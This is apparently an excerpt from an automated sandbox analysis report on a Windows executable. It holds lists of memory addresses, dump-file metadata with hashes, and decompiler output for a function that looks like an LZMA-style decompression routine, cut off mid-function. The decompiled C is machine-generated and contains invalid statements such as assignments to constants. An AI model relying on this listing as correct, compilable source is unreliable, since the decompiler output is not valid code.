                                                                            0x00406ae0
                                                                            0x00406ae3
                                                                            0x00406ae3
                                                                            0x00406ae6
                                                                            0x00406aea
                                                                            0x00406aec
                                                                            0x00406ac4
                                                                            0x00406ac4
                                                                            0x00406acc
                                                                            0x00406ad1
                                                                            0x00406ad3
                                                                            0x00406ad5
                                                                            0x00406ad5
                                                                            0x00406aef
                                                                            0x00406af6
                                                                            0x00406af9
                                                                            0x00000000
                                                                            0x00406afb
                                                                            0x00000000
                                                                            0x00406afb
                                                                            0x00406af9
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b3b
                                                                            0x00406b3b
                                                                            0x00406b3f
                                                                            0x00407147
                                                                            0x00000000
                                                                            0x00407147
                                                                            0x00406b45
                                                                            0x00406b48
                                                                            0x00406b4b
                                                                            0x00406b4f
                                                                            0x00406b52
                                                                            0x00406b58
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406b5d
                                                                            0x00406b60
                                                                            0x00406b60
                                                                            0x00406b66
                                                                            0x00406b04
                                                                            0x00406b04
                                                                            0x00406b07
                                                                            0x00000000
                                                                            0x00406b07
                                                                            0x00406b68
                                                                            0x00406b68
                                                                            0x00406b6b
                                                                            0x00406b6e
                                                                            0x00406b71
                                                                            0x00406b74
                                                                            0x00406b77
                                                                            0x00406b7a
                                                                            0x00406b7d
                                                                            0x00406b80
                                                                            0x00406b83
                                                                            0x00406b86
                                                                            0x00406b9e
                                                                            0x00406ba1
                                                                            0x00406ba4
                                                                            0x00406ba7
                                                                            0x00406ba7
                                                                            0x00406baa
                                                                            0x00406bae
                                                                            0x00406bb0
                                                                            0x00406b88
                                                                            0x00406b88
                                                                            0x00406b90
                                                                            0x00406b95
                                                                            0x00406b97
                                                                            0x00406b99
                                                                            0x00406b99
                                                                            0x00406bb3
                                                                            0x00406bba
                                                                            0x00406bbd
                                                                            0x00000000
                                                                            0x00406bbf
                                                                            0x00000000
                                                                            0x00406bbf
                                                                            0x00000000
                                                                            0x00406e4c
                                                                            0x00406e4c
                                                                            0x00406e50
                                                                            0x00407177
                                                                            0x00000000
                                                                            0x00407177
                                                                            0x00406e56
                                                                            0x00406e59
                                                                            0x00406e5c
                                                                            0x00406e60
                                                                            0x00406e63
                                                                            0x00406e69
                                                                            0x00406e6b
                                                                            0x00406e6b
                                                                            0x00406e6b
                                                                            0x00406e6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f5b
                                                                            0x00406f5f
                                                                            0x00406f81
                                                                            0x00406f84
                                                                            0x00406f8e
                                                                            0x00000000
                                                                            0x00406f8e
                                                                            0x00406f61
                                                                            0x00406f64
                                                                            0x00406f68
                                                                            0x00406f6b
                                                                            0x00406f6b
                                                                            0x00406f6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407018
                                                                            0x0040701c
                                                                            0x0040703a
                                                                            0x0040703a
                                                                            0x0040703a
                                                                            0x00407041
                                                                            0x00407048
                                                                            0x0040704f
                                                                            0x0040704f
                                                                            0x00000000
                                                                            0x0040704f
                                                                            0x0040701e
                                                                            0x00407021
                                                                            0x00407024
                                                                            0x00407027
                                                                            0x0040702e
                                                                            0x00406f72
                                                                            0x00406f72
                                                                            0x00406f75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407109
                                                                            0x0040710c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d43
                                                                            0x00406d45
                                                                            0x00406d4c
                                                                            0x00406d4d
                                                                            0x00406d4f
                                                                            0x00406d52
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d5a
                                                                            0x00406d5d
                                                                            0x00406d60
                                                                            0x00406d62
                                                                            0x00406d64
                                                                            0x00406d64
                                                                            0x00406d65
                                                                            0x00406d68
                                                                            0x00406d6f
                                                                            0x00406d72
                                                                            0x00406d80
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407056
                                                                            0x00407056
                                                                            0x00407059
                                                                            0x00407060
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407065
                                                                            0x00407065
                                                                            0x00407069
                                                                            0x004071a1
                                                                            0x00000000
                                                                            0x004071a1
                                                                            0x0040706f
                                                                            0x00407072
                                                                            0x00407075
                                                                            0x00407079
                                                                            0x0040707c
                                                                            0x00407082
                                                                            0x00407084
                                                                            0x00407084
                                                                            0x00407084
                                                                            0x00407087
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708d
                                                                            0x0040708d
                                                                            0x00407091
                                                                            0x004070f1
                                                                            0x004070f4
                                                                            0x004070f9
                                                                            0x004070fa
                                                                            0x004070fc
                                                                            0x004070fe
                                                                            0x00407101
                                                                            0x00000000
                                                                            0x00407101
                                                                            0x00407093
                                                                            0x00407099
                                                                            0x0040709c
                                                                            0x0040709f
                                                                            0x004070a2
                                                                            0x004070a5
                                                                            0x004070a8
                                                                            0x004070ab
                                                                            0x004070ae
                                                                            0x004070b1
                                                                            0x004070b4
                                                                            0x004070cd
                                                                            0x004070d0
                                                                            0x004070d3
                                                                            0x004070d6
                                                                            0x004070da
                                                                            0x004070dc
                                                                            0x004070dc
                                                                            0x004070dd
                                                                            0x004070e0
                                                                            0x004070b6
                                                                            0x004070b6
                                                                            0x004070be
                                                                            0x004070c3
                                                                            0x004070c5
                                                                            0x004070c8
                                                                            0x004070c8
                                                                            0x004070e3
                                                                            0x004070ea
                                                                            0x00000000
                                                                            0x004070ec
                                                                            0x00000000
                                                                            0x004070ec
                                                                            0x00000000
                                                                            0x00406d88
                                                                            0x00406d8b
                                                                            0x00406dc1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef4
                                                                            0x00406ef4
                                                                            0x00406ef7
                                                                            0x00406ef9
                                                                            0x00407183
                                                                            0x00000000
                                                                            0x00407183
                                                                            0x00406eff
                                                                            0x00406f02
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f08
                                                                            0x00406f0c
                                                                            0x00406f0f
                                                                            0x00406f0f
                                                                            0x00406f0f
                                                                            0x00000000
                                                                            0x00406f0f
                                                                            0x00406d8d
                                                                            0x00406d8f
                                                                            0x00406d91
                                                                            0x00406d93
                                                                            0x00406d96
                                                                            0x00406d97
                                                                            0x00406d99
                                                                            0x00406d9b
                                                                            0x00406d9e
                                                                            0x00406da1
                                                                            0x00406db7
                                                                            0x00406dbc
                                                                            0x00406df4
                                                                            0x00406df4
                                                                            0x00406df8
                                                                            0x00406e24
                                                                            0x00406e26
                                                                            0x00406e2d
                                                                            0x00406e30
                                                                            0x00406e33
                                                                            0x00406e33
                                                                            0x00406e38
                                                                            0x00406e38
                                                                            0x00406e3a
                                                                            0x00406e3d
                                                                            0x00406e44
                                                                            0x00406e47
                                                                            0x00406e74
                                                                            0x00406e74
                                                                            0x00406e77
                                                                            0x00406e7a
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00000000
                                                                            0x00406eee
                                                                            0x00406e7c
                                                                            0x00406e82
                                                                            0x00406e85
                                                                            0x00406e88
                                                                            0x00406e8b
                                                                            0x00406e8e
                                                                            0x00406e91
                                                                            0x00406e94
                                                                            0x00406e97
                                                                            0x00406e9a
                                                                            0x00406e9d
                                                                            0x00406eb6
                                                                            0x00406eb8
                                                                            0x00406ebb
                                                                            0x00406ebc
                                                                            0x00406ebf
                                                                            0x00406ec1
                                                                            0x00406ec4
                                                                            0x00406ec6
                                                                            0x00406ec8
                                                                            0x00406ecb
                                                                            0x00406ecd
                                                                            0x00406ed0
                                                                            0x00406ed4
                                                                            0x00406ed6
                                                                            0x00406ed6
                                                                            0x00406ed7
                                                                            0x00406eda
                                                                            0x00406edd
                                                                            0x00406e9f
                                                                            0x00406e9f
                                                                            0x00406ea7
                                                                            0x00406eac
                                                                            0x00406eae
                                                                            0x00406eb1
                                                                            0x00406eb1
                                                                            0x00406ee0
                                                                            0x00406ee7
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00000000
                                                                            0x00406ee9
                                                                            0x00000000
                                                                            0x00406ee9
                                                                            0x00406ee7
                                                                            0x00406dfa
                                                                            0x00406dfd
                                                                            0x00406dff
                                                                            0x00406e02
                                                                            0x00406e05
                                                                            0x00406e08
                                                                            0x00406e0a
                                                                            0x00406e0d
                                                                            0x00406e10
                                                                            0x00406e10
                                                                            0x00406e13
                                                                            0x00406e13
                                                                            0x00406e16
                                                                            0x00406e1d
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00406e1d
                                                                            0x00406da3
                                                                            0x00406da6
                                                                            0x00406da8
                                                                            0x00406dab
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b0a
                                                                            0x00406b0a
                                                                            0x00406b0e
                                                                            0x00407153
                                                                            0x00000000
                                                                            0x00407153
                                                                            0x00406b14
                                                                            0x00406b17
                                                                            0x00406b1a
                                                                            0x00406b1d
                                                                            0x00406b20
                                                                            0x00406b23
                                                                            0x00406b26
                                                                            0x00406b28
                                                                            0x00406b2b
                                                                            0x00406b2e
                                                                            0x00406b31
                                                                            0x00406b33
                                                                            0x00406b33
                                                                            0x00406b33
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f1c
                                                                            0x00406f1f
                                                                            0x00406f22
                                                                            0x00406f25
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f2a
                                                                            0x00406f2d
                                                                            0x00406f30
                                                                            0x00406f33
                                                                            0x00406f36
                                                                            0x00406f39
                                                                            0x00406f3a
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3f
                                                                            0x00406f42
                                                                            0x00406f45
                                                                            0x00406f48
                                                                            0x00406f4b
                                                                            0x00406f4f
                                                                            0x00406f51
                                                                            0x00406f54
                                                                            0x00000000
                                                                            0x00406f56
                                                                            0x00000000
                                                                            0x00406f56
                                                                            0x00406f54
                                                                            0x00407189
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067b8

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
                                                                            • Instruction ID: 7a557209975026f945a3d96698a9d3e809275b90a73cce2131b371529b247a98
                                                                            • Opcode Fuzzy Hash: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
                                                                            • Instruction Fuzzy Hash: 0F813471D04228CFDF24CFA8C884BADBBB1FB44305F25816AD456BB281C778A996DF45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406776, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 98%
                                                                            			E00406776(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004071C8))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
